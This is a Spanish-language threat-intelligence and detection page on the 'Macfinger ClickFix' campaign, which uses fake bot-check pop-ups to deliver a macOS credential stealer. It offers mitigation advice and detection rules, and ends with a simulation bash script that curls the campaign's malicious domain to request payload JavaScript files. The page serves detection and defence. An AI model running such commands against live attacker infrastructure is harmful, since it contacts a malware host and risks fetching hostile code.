Campaña Macfinger ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una nueva campaña de ingeniería social rastreada como Macfinger ClickFix apunta a usuarios de macOS inyectando scripts maliciosos en sitios web legítimos. El ataque presenta falsas páginas de protección contra bots que engañan a las víctimas para que ejecuten comandos que descargan malware específico de macOS. La carga útil parece ser una variante del ladrón de macOS Atomic (AMOS) diseñado para robar credenciales y otra información del usuario.
Investigación
La investigación identificó sitios web legítimos comprometidos con scripts inyectados que muestran ventanas emergentes de verificación falsas. El análisis del tráfico de red reveló un dominio dedicado utilizado para el seguimiento de usuarios, junto con varias direcciones IP que soportan la entrega de malware y las comunicaciones de Comando y Control (C2). Los patrones de tráfico observados indican exfiltración de credenciales e información del sistema a través de solicitudes HTTP POST.
Mitigación
Los usuarios deben ser entrenados para evitar seguir instrucciones presentadas por ventanas emergentes inesperadas del navegador o falsas páginas de verificación de bots. Las organizaciones deben implementar filtros web para bloquear dominios y direcciones IP maliciosas conocidas asociadas con campañas de ClickFix. También se recomienda monitorear conexiones salientes inusuales a direcciones IP no confiables a través de puertos no estándar.
Respuesta
Si se detecta actividad de Macfinger ClickFix, los hosts macOS afectados deben ser aislados inmediatamente para detener la exfiltración de datos adicionales. Los respondedores deben realizar una investigación forense completa para determinar el alcance del compromiso de credenciales. Las credenciales potencialmente expuestas deben ser restablecidas, y los sistemas deben ser revisados para detectar mecanismos de persistencia como scripts shell no autorizados o binarios Mach-O.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Intento de Comunicación de Dominio de Consulta de IP Posible (vía dns)
Comando y Control Sospechoso por Solicitud DNS a Dominio de Nivel Superior (TLD) Inusual (vía dns)
Intento de Enumeración de System_profiler Posible (vía process_creation)
Manipulación de Cadenas Codificadas en Base64 Posible [MacOS] (vía cmdline)
Intento de Ejecución de Curl Sospechoso [MacOS] (vía cmdline)
IOC (HashSha256) para detectar: campaña Macfinger ClickFix
IOC (SourceIP) para detectar: campaña Macfinger ClickFix
IOC (DestinationIP) para detectar: campaña Macfinger ClickFix
Detectar Tráfico de la Campaña Macfinger ClickFix [Firewall]
Detectar Inyección de Script de Macfinger ClickFix [Servidor Web]
Ejecución de Simulación
-
Narrativa & Comandos de Ataque: Un adversario utiliza una técnica de ingeniería social conocida como «ClickFix», donde se indica al usuario que haga clic en un botón (a menudo un falso «arreglo» o «actualización») que ejecuta un script malicioso. En esta simulación, imitamos la etapa final: el navegador/agente del lado del cliente realizando una solicitud al dominio controlado por Macfinger
velvet-otter-glagceis.lifepara obtener un.jsarchivo malicioso. Esta solicitud está diseñada para coincidir con uno de los tres criterios de selección específicos en la lógica de detección. -
Script de Prueba de Regresión:
#!/bin/bash # Script de simulación para activar la regla de detección de Macfinger ClickFix echo "[*] Iniciando simulación de Macfinger ClickFix..." # Objetivo 1: selección1 (parámetro del sitio) echo "[*] Simulando solicitud a selección1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Objetivo 2: selección2 (archivo hash específico) echo "[*] Simulando solicitud a selección2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Objetivo 3: selección3 (archivo ext-b) echo "[*] Simulando solicitud a selección3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Simulación completa. Verifique las alertas en el SIEM." -
Comandos de Limpieza:
# No se requiere limpieza local ya que estas son solicitudes de red salientes. # Si se crearon archivos locales, elimínelos: rm -f /tmp/macfinger_test_*